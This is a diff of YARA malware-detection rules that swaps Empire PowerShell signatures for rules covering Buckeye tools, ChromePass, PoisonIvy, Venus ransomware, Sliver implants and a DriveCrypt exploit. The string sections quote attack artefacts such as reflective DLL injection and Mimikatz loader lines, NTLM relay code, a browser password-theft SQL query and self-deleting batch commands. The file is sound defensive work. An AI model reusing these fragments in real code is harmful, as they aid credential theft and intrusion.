+		$s4 = "\\Libraries" ascii
 
 	condition:
-		( uint16( 0 ) == 0x233c and filesize < 2000KB and 1 of them ) or all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
 }
-rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen2 : FILE
+rule SIGNATURE_BASE_Unknown_Malware_Sample_Jul17_2 : FILE
 {
 	meta:
-		description = "Detects Empire component"
+		description = "Detects unknown malware sample with pastebin RAW URL"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eab277ca-0dd4-5035-82aa-1ac2120bac94"
-		date = "2016-11-05"
+		id = "ce82b9eb-a9cb-5122-85dc-22794174c2f8"
+		date = "2017-08-01"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L409-L428"
+		reference = "https://goo.gl/iqH8CK"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_generic.yar#L73-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e3cb63d0c3278ee4d04cb4b1d6ebe817fb3da97d25e2581f95bd43ecd5142b30"
+		logic_hash = "966e14331fa89f2cdb5593a0c10227264085ee127deed28341e395ba6845e19d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
-		hash3 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
-		hash5 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
-		hash6 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
-		hash8 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
+		hash1 = "3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52"
 
 	strings:
-		$x1 = "$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)" fullword ascii
-		$s20 = "#Shellcode: CallDllMain.asm" fullword ascii
+		$s1 = "4System.Web.Services.Protocols.SoapHttpClientProtocol" fullword ascii
+		$s2 = "https://pastebin.com/raw/" wide
+		$s3 = "My.Computer" fullword ascii
+		$s4 = "MyTemplate" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Empire_Agent_Gen : FILE
+rule SIGNATURE_BASE_MAL_Unspecified_Jan18_1 : FILE
 {
 	meta:
-		description = "Detects Empire component - from files agent.ps1, agent.ps1"
+		description = "Detects unspecified malware sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0fac915c-2502-50da-93d1-f81e9282aa9a"
-		date = "2016-11-05"
+		id = "f3187c60-8fff-54de-9918-2fb2301f2d92"
+		date = "2018-01-19"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L430-L447"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_generic.yar#L91-L110"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ed8aee7ac6c1d93b21cc1aa5c3c18df1566692c63a010715a3aae65e18fffa60"
+		logic_hash = "cd4f7247473e04c348b49970ee3a6fd01415f005ac6dc7a79fbf937a693a80f4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db"
-		hash2 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db"
+		hash1 = "f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417"
 
 	strings:
-		$s1 = "$wc.Headers.Add(\"User-Agent\",$script:UserAgent)" fullword ascii
-		$s2 = "$min = [int]((1-$script:AgentJitter)*$script:AgentDelay)" fullword ascii
-		$s3 = "if ($script:AgentDelay -ne 0){" fullword ascii
+		$s1 = "User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword ascii
+		$s2 = "ping 192.0.2.2 -n 1 -w %d >nul 2>&1" fullword ascii
+		$s3 = "[Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword ascii
+		$s4 = "start /b \"\" cmd /c del \"%%~f0\"&exit /b" fullword ascii
+		$s5 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword ascii
+		$s6 = "%s\\%s.bat" fullword ascii
+		$s7 = "DEL /s \"%s\" >nul 2>&1" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x660a and filesize < 100KB and 1 of them ) or all of them
+		filesize < 300KB and 2 of them
 }
-rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen3 : FILE
+rule SIGNATURE_BASE_HKTL_Buckeye_Osinfo : FILE
 {
 	meta:
-		description = "Detects Empire component"
+		description = "Detects OSinfo tool used by the Buckeye APT group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b0f7ed41-be65-5e43-aeb1-56e5e7384e8f"
-		date = "2016-11-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L449-L467"
+		id = "e40a86d1-fd1a-5430-b7b7-8cc7ca128cc5"
+		date = "2016-09-05"
+		modified = "2025-03-19"
+		reference = "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_buckeye.yar#L10-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "933fe27c54e90806a21082b4d2e4cbb3491374e48834a64c0d6a520c537d145e"
-		score = 75
+		logic_hash = "782ae4293db0839190a9533d2c45baff92527867bfcd048ccae82611f165601b"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
-		hash2 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
-		hash3 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
-		hash4 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
 
 	strings:
-		$s1 = "if (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -eq [IntPtr]::Zero))" fullword ascii
-		$s2 = "remote DLL injection" ascii
+		$s1 = "-s ShareInfo ShareDir" fullword ascii
+		$s2 = "-a Local And Global Group User Info" fullword ascii
+		$s3 = "-f <infile> //input server list from infile, OneServerOneLine" fullword ascii
+		$s4 = "info <\\server> <user>" fullword ascii
+		$s5 = "-c Connect Test" fullword ascii
+		$s6 = "-gd Group Domain Admins" fullword ascii
+		$s7 = "-n NetuseInfo" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and 3 of ( $s* )
 }
-rule SIGNATURE_BASE_Empire_Invoke_Inveighrelay_Gen : FILE
+rule SIGNATURE_BASE_HKTL_Remotecmd : FILE
 {
 	meta:
-		description = "Detects Empire component - from files Invoke-InveighRelay.ps1, Invoke-InveighRelay.ps1"
+		description = "Detects a remote access tool used by APT groups - file RemoteCmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0adebf6f-99e1-5461-8efc-e4660faf6d5d"
-		date = "2016-11-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L469-L484"
+		id = "384f37f3-4562-5d79-9793-0384c43d4602"
+		date = "2016-09-08"
+		modified = "2022-12-21"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_buckeye.yar#L31-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "183a0afa9233e380471ddfa8f85e6c6555d69c785c9a4e8791e19432b6849558"
-		score = 75
+		logic_hash = "873cc02674e386577e86cb9b702265c25dd24b1f203741e8628e30c191dc99e0"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash2 = "21b90762150f804485219ad36fa509aeda210d46453307a9761c816040312f41"
+		hash1 = "5264d1de687432f8346617ac88ffcb31e025e43fc3da1dad55882b17b44f1f8b"
 
 	strings:
-		$s1 = "$inveigh.SMBRelay_failed_list.Add(\"$HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string $SMBRelayTarget\")" fullword ascii
-		$s2 = "$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)" fullword ascii
+		$s1 = "RemoteCmd.exe" fullword wide
+		$s2 = "\\Release\\RemoteCmd.pdb" ascii
+		$s3 = "RemoteCmd [ComputerName] [Executable] [Param1] [Param2] ..." fullword wide
+		$s4 = "http://{0}:65101/CommandEngine" fullword wide
+		$s5 = "Brenner.RemoteCmd.Client" fullword ascii
+		$s6 = "$b1888995-1ee5-4f6d-82df-d2ab8ae73d63" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 200KB and 1 of them ) or all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and 2 of them ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_Empire_Keepassconfig_Gen : FILE
+rule SIGNATURE_BASE_HKTL_Chromepass : FILE
 {
 	meta:
-		description = "Detects Empire component - from files KeePassConfig.ps1, KeePassConfig.ps1"
+		description = "Detects a tool used by APT groups - file ChromePass.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e2bc88c5-50f8-5ddc-a449-41929b1d0528"
-		date = "2016-11-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L486-L500"
+		id = "950b9761-bdfd-514b-90ea-a1454d35ce5a"
+		date = "2016-09-08"
+		modified = "2025-03-10"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_buckeye.yar#L53-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "986f299d2b6e2ec47acae09d8a25b6c45caf83c964208c594433308cd11ad264"
+		logic_hash = "bda90d2718be5cf9ddb95b88171c937c5fad5729aa1717a13a34a8b48dd1865c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash2 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3"
+		hash1 = "5ff43049ae18d03dcc74f2be4a870c7056f6cfb5eb636734cca225140029de9a"
 
 	strings:
-		$s1 = "$KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)" fullword ascii
+		$x1 = "\\Release\\ChromePass.pdb" ascii
+		$x2 = "Windows Protect folder for getting the encryption keys" wide
+		$x3 = "Chrome User Data folder where the password file is stored" wide
+		$s1 = "Opera Software\\Opera Stable\\Login Data" fullword wide
+		$s2 = "Yandex\\YandexBrowser\\User Data\\Default\\Login Data" fullword wide
+		$s3 = "Load the passwords from another Windows user or external drive: " fullword wide
+		$s4 = "Windows Login Password:" fullword wide
+		$s5 = "SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created fr" ascii
+		$s6 = "Chrome Password Recovery" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x7223 and filesize < 80KB and 1 of them ) or all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of ( $x* ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_Empire_Invoke_Portscan_Gen : FILE
+rule SIGNATURE_BASE_Poisonivy_Generic_3 : FILE
 {
 	meta:
-		description = "Detects Empire component - from files Invoke-Portscan.ps1, Invoke-Portscan.ps1"
+		description = "PoisonIvy RAT Generic Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c2e01780-02d2-57d1-b38e-5c345ebccad6"
-		date = "2016-11-05"
+		id = "0f6a47ee-b741-59cc-b2d6-6bf3989ce8e7"
+		date = "2015-05-14"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L502-L517"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poisonivy_gen3.yar#L2-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "05e786dc42ee5ec56197803577d104595ad6554e028b7633b2f7fdf55a63e27c"
+		hash = "e1cbdf740785f97c93a0a7a01ef2614be792afcd"
+		logic_hash = "8116b07c00218a0e9784447f322455ff24ae754770b85db760b1c397e10e5695"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash2 = "cf7030be01fab47e79e4afc9e0d4857479b06a5f68654717f3bc1bc67a0f38d3"
 
 	strings:
-		$s1 = "Test-Port -h $h -p $Port -timeout $Timeout" fullword ascii
-		$s2 = "1 {$nHosts=10;  $Threads = 32;   $Timeout = 5000 }" fullword ascii
+		$k1 = "Tiger324{" fullword ascii
+		$s2 = "WININET.dll" fullword ascii
+		$s3 = "mscoree.dll" fullword wide
+		$s4 = "WS2_32.dll" fullword
+		$s5 = "Explorer.exe" fullword wide
+		$s6 = "USER32.DLL"
+		$s7 = "CONOUT$"
+		$s8 = "login.asp"
+		$h1 = "HTTP/1.0"
+		$h2 = "POST"
+		$h3 = "login.asp"
+		$h4 = "check.asp"
+		$h5 = "result.asp"
+		$h6 = "upload.asp"
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 100KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( $k1 or all of ( $s* ) or all of ( $h* ) )
 }
-rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen4 : FILE
+
+rule SIGNATURE_BASE_MAL_RANSOM_Venus_Nov22_1 : FILE
 {
 	meta:
-		description = "Detects Empire component"
+		description = "Detects Venus Ransomware samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c390638a-0eb1-576d-a08c-203c31d414f3"
-		date = "2016-11-05"
+		id = "0f7e0ca4-c5e2-5557-92de-2e0d73035f12"
+		date = "2022-11-16"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L519-L545"
+		reference = "https://twitter.com/dyngnosis/status/1592588860168421376"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_venus.yar#L3-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "314574a463f9cc772702d5e3358f5280b2805298fedb89c14786518a4832d63b"
-		score = 75
+		logic_hash = "3c94d59015897f180ef55608a2761b37c7b52193e28895ea6a4c0548acf3ad34"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "743c51334f17751cfd881be84b56f648edbdaf31f8186de88d094892edc644a9"
-		hash2 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
-		hash3 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
-		hash4 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
-		hash5 = "304031aa9eca5a83bdf1f654285d86df79cb3bba4aa8fe1eb680bd5b2878ebf0"
-		hash6 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
-		hash7 = "0218be4323959fc6379489a6a5e030bb9f1de672326e5e5b8844ab5cedfdcf88"
-		hash8 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
-		hash9 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
-		hash10 = "fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438"
+		hash1 = "46f9cbc3795d6be0edd49a2c43efe6e610b82741755c5076a89eeccaf98ee834"
+		hash2 = "6d8e2d8f6aeb0f4512a53fe83b2ef7699513ebaff31735675f46d1beea3a8e05"
+		hash3 = "931cab7fbc0eb2bbc5768f8abdcc029cef76aff98540d9f5214786dccdb6a224"
+		hash4 = "969bfe42819e30e35ca601df443471d677e04c988928b63fccb25bf0531ea2cc"
+		hash5 = "db6fcd33dcb3f25890c28e47c440845b17ce2042c34ade6d6508afd461bfa21c"
+		hash6 = "ee036f333a0c4a24d9aa09848e635639e481695a9209474900eb71c9e453256b"
+		hash7 = "fa7ba459236c7b27a0429f1961b992ab87fc8b3427469fd98bfc272ae6852063"
 
 	strings:
-		$s1 = "Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }" fullword ascii
-		$s2 = "# Get a handle to the module specified" fullword ascii
-		$s3 = "$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))" fullword ascii
-		$s4 = "$DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')" fullword ascii
+		$x1 = "<html><head><title>Venus</title><style type = \"text" ascii fullword
+		$x2 = "xXBLTZKmAu9pjcfxrIK4gkDp/J9XXATjuysFRXG4rH4=" ascii fullword
+		$x3 = "%s%x%x%x%x.goodgame" wide fullword
+		$s1 = "/c ping localhost -n 3 > nul & del %s" ascii fullword
+		$s2 = "C:\\Windows\\%s.png" wide
+		$op1 = { 8b 4c 24 24 46 8b 7c 24 14 41 8b 44 24 30 81 c7 00 04 00 00 81 44 24 10 00 04 00 00 40 }
+		$op2 = { 57 c7 45 fc 00 00 00 00 7e 3f 50 33 c0 74 03 9b 6e }
+		$op3 = { 66 89 45 d4 0f 11 45 e8 e8 a8 e7 ff ff 83 c4 14 8d 45 e8 50 8d 45 a4 50 }
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( pe.imphash ( ) == "bb2600e94092da119ee6acbbd047be43" or 1 of ( $x* ) or 2 of them ) or 4 of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Credentialinjection_Invoke_Mimikatz_Gen : FILE
+
+rule SIGNATURE_BASE_Sliver_Implant_32Bit_1
 {
 	meta:
-		description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d938aadf-6924-5964-9b5a-6bd1b817349f"
-		date = "2016-11-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L547-L563"
+		description = "Sliver 32-bit implant (with and without --debug flag at compile)"
+		author = "gssincla@google.com"
+		id = "6bc4d7d1-64cf-5920-8f07-54a8a7a94f26"
+		date = "2022-11-18"
+		modified = "2025-03-21"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_gcti_sliver.yar#L26-L94"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3210b4407c3209a20d74c8c5af66077cc9b902912ae49253883b7acd87eef1f9"
+		hash = "911f4106350871ddb1396410d36f2d2eadac1166397e28a553b28678543a9357"
+		logic_hash = "3fec6fbba86a24b395e58f02fb35a60b1b9a4b941b4d85c060cc6159c6aa8265"
 		score = 75
-		quality = 60
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
-		hash2 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
+		quality = 85
+		tags = ""
 
 	strings:
-		$s1 = "$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle" fullword ascii
-		$s2 = "$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs" fullword ascii
+		$s_tcppivot = { 81 ?? 74 63 70 70 [2-20] 81 ?? 04 69 76 6F 74  }
+		$s_wg = { 66 81 ?? 77 67 }
+		$s_dns = { 66 81 ?? 64 6E [2-20] 80 ?? 02 73 }
+		$s_http = { 81 ?? 68 74 74 70 }
+		$s_https = { 81 ?? 68 74 74 70 [2-20] 80 ?? 04 73 }
+		$s_mtls = { 81 ?? 6D 74 6C 73 }
+		$fp1 = "cloudfoundry" ascii fullword
+		$fp2 = "googleapi.Error" ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
+		4 of ( $s* ) and not 1 of ( $fp* ) and not pe.number_of_signatures > 0
 }
-rule SIGNATURE_BASE_Empire_Invoke_Gen : FILE
+
+rule SIGNATURE_BASE_Sliver_Implant_64Bit_1
 {
 	meta:
-		description = "Detects Empire component - from files Invoke-DCSync.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "913f971d-e4e3-55e9-904b-82b25a4e6f0f"
-		date = "2016-11-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L565-L582"
+		description = "Sliver 64-bit implant (with and without --debug flag at compile)"
+		author = "gssincla@google.com"
+		id = "b84db933-0e11-5871-821d-43697c015665"
+		date = "2022-11-18"
+		modified = "2025-03-21"
+		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_gcti_sliver.yar#L112-L183"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "11d00ea1f40d34cfd3417db337a01eca39b0e77049f74f0c591cd1d388a8d194"
+		hash = "2d1c9de42942a16c88a042f307f0ace215cdc67241432e1152080870fe95ea87"
+		logic_hash = "ccfd944a5bc6521c89d44572910e2998e2404d472a593f9d97224d606d247bcd"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
-		hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
-		hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
+		tags = ""
 
 	strings:
-		$s1 = "$Shellcode1 += 0x48" fullword ascii
-		$s2 = "$PEHandle = [IntPtr]::Zero" fullword ascii
+		$s_tcppivot = { 48 ?? 74 63 70 70 69 76 6F 74 }
+		$s_namedpipe = { 48 ?? 6E 61 6D 65 64 70 69 70 [2-32] 80 ?? 08 65 }
+		$s_https = { 81 ?? 68 74 74 70 [2-32] 80 ?? 04 73 }
+		$s_wg = {66 81 ?? 77 67}
+		$s_dns = { 66 81 ?? 64 6E [2-20] 80 ?? 02 73 }
+		$s_mtls = {  81 ?? 6D 74 6C 73  }
+		$fp1 = "cloudfoundry" ascii fullword
+		$fp2 = "googleapi.Error" ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 3000KB and 1 of them ) or all of them
+		5 of ( $s* ) and not 1 of ( $fp* ) and not pe.number_of_signatures > 0
 }
-rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen5 : FILE
+rule SIGNATURE_BASE_EXP_Drivecrypt_1 : FILE
 {
 	meta:
-		description = "Detects Empire component"
+		description = "Detects DriveCrypt exploit"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4c23592e-5788-5b84-995a-028142cbc52f"
-		date = "2016-11-05"
+		id = "c192ca53-1de3-5d2d-a216-47e534ff4d01"
+		date = "2018-08-21"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_empire.yar#L584-L601"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_drivecrypt.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "115fffabb09ed00ab46c6f980c3a7727070a303cafa900cc1ce04e3999b6b70e"
+		logic_hash = "1959f2e4838e40f2abc26ee16b03089088c96cafb101125bdc346f69fe76d7a4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
-		hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
-		hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
+		hash1 = "0dd09bc97c768abb84d0fb6d1ae7d789f1f83bfb2ce93ff9ff3c538dc1effa33"
 
 	strings:
-		$s1 = "if ($ExeArgs -ne $null -and $ExeArgs -ne '')" fullword ascii
-		$s2 = "$ExeArgs = \"ReflectiveExe $ExeArgs\"" fullword ascii
+		$s1 = "x64passldr.exe" fullword ascii
+		$s2 = "DCR.sys" fullword ascii
+		$s3 = "amd64\\x64pass.sys" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 1000KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and 2 of them
 }
-
-rule SIGNATURE_BASE_MAL_Ryuk_Ransomware : FILE
+rule SIGNATURE_BASE_EXP_Drivecrypt_X64Passldr : FILE
 {
 	meta:
-		description = "Detects strings known from Ryuk Ransomware"
+		description = "Detects DriveCrypt exploit"
 		author = "Florian Roth (Nextron Systems)"
-		id = "25d40631-4158-5d3d-913e-a2f1233489e0"
-		date = "2018-12-31"
-		modified = "2023-12-05"
-		reference = "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ryuk_ransomware.yar#L3-L24"
+		id = "94594b4e-091d-5964-b2b4-5d7d44601b28"
+		date = "2018-08-21"
+		modified = "2023-01-06"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_drivecrypt.yar#L19-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "01e8ad348e5954374fc0f9fc25ba1ee83db4a2a50e622b27640aa2eb394dc5a0"
+		logic_hash = "573cd96f7f82788a3884cd4b4d91c739a890835c3ed1b3933af48ba5756cc5a6"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "965884f19026913b2c57b8cd4a86455a61383de01dabb69c557f45bb848f6c26"
